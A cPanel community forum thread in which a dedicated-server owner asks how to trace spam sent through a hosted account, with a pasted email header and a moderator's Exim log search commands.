Spam emails being sent from my dedicated server

CharlesGLondon

• January 14, 2023 10:51

Hello All, I've a dedicated server with many accounts on it. I'm receiving spam emails from this server. Emails are sent from the dedicated server's main IP address using an account hosted on this server. Email is sent to my personal email which is a separate domain hosted elsewhere. There are around 10-20 emails being sent per day. I've been checked the exim configuration as mentioned on I couldn't find anything suspicious. I can't figure out if there is any malicious script on my dedicated server sending these emails or it is relayed using my dedicated server's smtp? How do I find out? Any tips on how do I find out the culprit and fix it? ======= Email header. I've modified some of the details for privacy.=============== CrytoUncef Ieguldiet $1 "odien, lai r?t veiktu $1000. To: My Name Envelope-To: X-Antiabuse: This header was added to track abuse, please include it with any abuse report X-Antiabuse: Primary Hostname - dedicatedserver.ip-111-111-111.eu X-Antiabuse: Original Domain - mypersonaldomain.com X-Antiabuse: Originator/Caller UID/GID - [47 12] / [47 12] X-Antiabuse: Sender Address Domain - hotmail.com X-Source-Args: Return-Path: Ui-Inboundreport: junk:10;M01:P0:RItwhPGlRLY=;397...... ..... Mime-Version: 1.0 Authentication-Results: kundenserver.de; dkim=pass header.i=@sendingdomain.com X-Source-Dir: Content-Transfer-Encoding: quoted-printable <729dc0f1b4328e45f76e95cd1b4a8b1e@sendingdomain.com> Dkim-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=sendingdomain.com; s=default; h=Content-Transfer-Encoding:Content-Type: MIME-Version:To:From:Subject:Date:Message-ID:Sender:Reply-To:Cc:Content-ID: Content-Description:Resent-Date:Resent-From:Resent-Sender:Resent-To:Resent-Cc :Resent-Message-ID:In-Reply-To:References:List-Id:List-Help:List-Unsubscribe: List-Subscribe:List-Post:List-Owner:List-Archive; bh=RjSCyL9BMDveAcwCExzGtVjZlFMOy0LjmD+n1hmVAwU=; b=iEzWTENLUffBNI69v11zCdP4Af Y07b0tzY+ZY0afZL9uUXK3ZTUxGeTOHeTUAiurE3+ku+aAPt+Nyg3vrJyVeT/tbBvNxwa8NYjSvIi KsPTJMQHE15763kcX4vLNU/W7N6BT9zaDa8Yu1pDDYe4enzScNhGYCgK7khqcgAJfNj8mM7HgG6Nc mfRs7dXZPLgfTMSs+v9BTmKX/vlnwgpngGvnehxznw0C/DqlG410rjZ7yH8Hma3H4eJQDTWBeC95d M1qkZoD5YyY0zCGc+Ryzh4H2jK7F1UdGtaqILHfPNWF36aTgvS5nbRrD1gnwdIHqJo2gghHKbSWm+ FibYaJjA==; X-Authenticated-Sender: dedicatedserver.ip-111-111-111.eu: indreclv X-Get-Message-Sender-Via: dedicatedserver.ip-111-111-111.eu: acl_c_authenticated_local_user: indreclv X-Spam-Flag: YES Content-Type: text/plain; charset=utf-8 X-Source: Received: from dedicatedserver.ip-111-111-111.eu ([123.123.123.123]) by mx.kundenserver.de (mxeue012 [212.227.15.41]) with ESMTPS (Nemesis) id 1Mox02-1oxNSl2ZkU-00qUo3 for ; Sat, 14 Jan 2023 16:22:45 +0100 Received: from [::1] (port=46354 helo=sendingdomain.com) by dedicatedserver.ip-111-111-111.eu with esmtp (Exim 4.95) (envelope-from ) id 1pGiMo-0000QE-4A for mypersonalemail@mypersonaldomain.com; Sat, 14 Jan 2023 16:22:45 +0100

• 

  cPRex Jurassic Moderator

  • January 16, 2023 02:31

  Hey there! My first thought, is that our updated docs are all at docs.cpanel.net - the old "documentation.cpanel.net" site is left up for some API calls and legacy applications, but likely shouldn't be referenced for day-to-day use. I like this command - it searches the Exim logs and finds all messages sent from directories. Just be sure to ignore odd directories like /, /etc/csf (if you have that tool installed), and /var/spool/exim: awk '$3 ~ /^cwd/{print $3}' /var/log/exim_mainlog | sort | uniq -c | sed "s|^ *||g" | sort -nr
  If the spam is being sent from a user's directory, that should help you track it down, so I'd start there and see what you find! You could also search your Exim log (/var/log/exim_mainlog) directly for the "1Mox02-1oxNSl2ZkU-00qUo3" ID and see if that gives you more details about where it originated from.

  0
• 

  CharlesGLondon

  • January 16, 2023 10:10

  Hello, Thanks for the reply. I ran the code and it doesn't seem to show many emails. Sorry for some reason I can't paste command here so attaching it. exim_log search gives no result.

  0
• 

  cPRex Jurassic Moderator

  • January 16, 2023 10:46

  We may not be looking for "many" emails if you're only seeing 10-20 per day. This would only show the messages sent since the last time the Exim log was rotated - you could find how far back the log goes by running this command: head -n 1 /var/log/exim_mainlog
  as that would show the first entry in the log. I would check out some of those /web directories to see if that could be the issue.

  0
• 

  CharlesGLondon

  • January 16, 2023 12:36

  Didn't help much. What should I check for in these /home directories?

  0
• 

  cPRex Jurassic Moderator

  • January 16, 2023 16:17

  So that is letting you know that you're only getting the last day of logs. I can't say what specifically could be in the home directories as it could be anything - it only takes one malicious file or misconfigured web form to cause spam to be sent.

  0

Please sign in to leave a comment.